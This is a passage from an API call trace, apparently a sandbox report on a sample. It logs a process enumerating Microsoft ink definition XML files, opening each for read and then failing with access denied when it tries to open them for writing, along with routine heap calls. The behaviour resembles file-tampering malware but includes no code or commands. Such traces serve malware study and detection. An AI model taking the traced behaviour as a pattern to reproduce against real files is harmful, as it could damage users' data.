Context=0x0) returned 1 [0099.342] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.342] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x269, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="base_rtl.xml", cAlternateFileName="")) returned 1 [0099.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0099.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0099.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0099.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0099.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0099.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0099.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0099.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.343] AreFileApisANSI () returned 1 [0099.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpUsedDefaultChar=0x0) returned 83 [0099.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0099.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.343] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.343] AreFileApisANSI () returned 1 [0099.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0099.343] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0099.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x5fd18, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 83 [0099.343] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.472] GetFileType (hFile=0x27c) returned 0x1 [0099.472] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0099.472] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.473] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.473] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.473] CloseHandle (hObject=0x27c) returned 1 [0099.473] AreFileApisANSI () returned 1 [0099.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0099.473] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0099.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 83 [0099.473] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.473] GetLastError () returned 0x5 [0099.473] GetLastError () returned 0x5 [0099.473] SetLastError (dwErrCode=0x5) [0099.474] GetLastError () returned 0x5 [0099.474] SetLastError (dwErrCode=0x5) [0099.474] GetLastError () returned 0x5 [0099.474] SetLastError (dwErrCode=0x5) [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0099.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.474] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.474] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x40e8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ja-jp.xml", cAlternateFileName="")) returned 1 [0099.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0099.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0099.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0099.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0099.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.475] AreFileApisANSI () returned 1 [0099.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpUsedDefaultChar=0x0) returned 80 [0099.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0099.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.475] AreFileApisANSI () returned 1 [0099.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0099.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8c998, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 80 [0099.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.475] GetFileType (hFile=0x27c) returned 0x1 [0099.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0099.476] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.476] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.476] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.476] CloseHandle (hObject=0x27c) returned 1 [0099.476] AreFileApisANSI () returned 1 [0099.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0099.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8cb90, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 80 [0099.476] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.476] GetLastError () returned 0x5 [0099.477] GetLastError () returned 0x5 [0099.477] SetLastError (dwErrCode=0x5) [0099.477] GetLastError () returned 0x5 [0099.477] SetLastError (dwErrCode=0x5) [0099.477] GetLastError () returned 0x5 [0099.477] SetLastError (dwErrCode=0x5) [0099.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0099.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0099.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.477] FindNextFileW (in: hFindFile=0x785d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3af9, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ko-kr.xml", cAlternateFileName="")) returned 1 [0099.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0099.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0099.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0099.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0099.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0099.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0099.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0099.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.478] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.478] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.478] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.478] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0099.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.478] AreFileApisANSI () returned 1 [0099.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml", lpUsedDefaultChar=0x0) returned 80 [0099.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0099.478] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.478] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.478] AreFileApisANSI () returned 1 [0099.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0099.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x8c7a0, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 80 [0099.478] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.478] GetFileType (hFile=0x27c) returned 0x1 [0099.478] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0099.479] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.479] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.479] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.479] CloseHandle (hObject=0x27c) returned 1 [0099.479] AreFileApisANSI () returned 1 [0099.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0099.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x8ca40, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 80 [0099.479] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.479] GetLastError () returned 0x5 [0099.479] GetLastError () returned 0x5 [0099.479] SetLastError (dwErrCode=0x5) [0099.480] GetLastError () returned 0x5 [0099.480] SetLastError (dwErrCode=0x5) [0099.480] GetLastError () returned 0x5 [0099.480] SetLastError (dwErrCode=0x5) [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0099.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 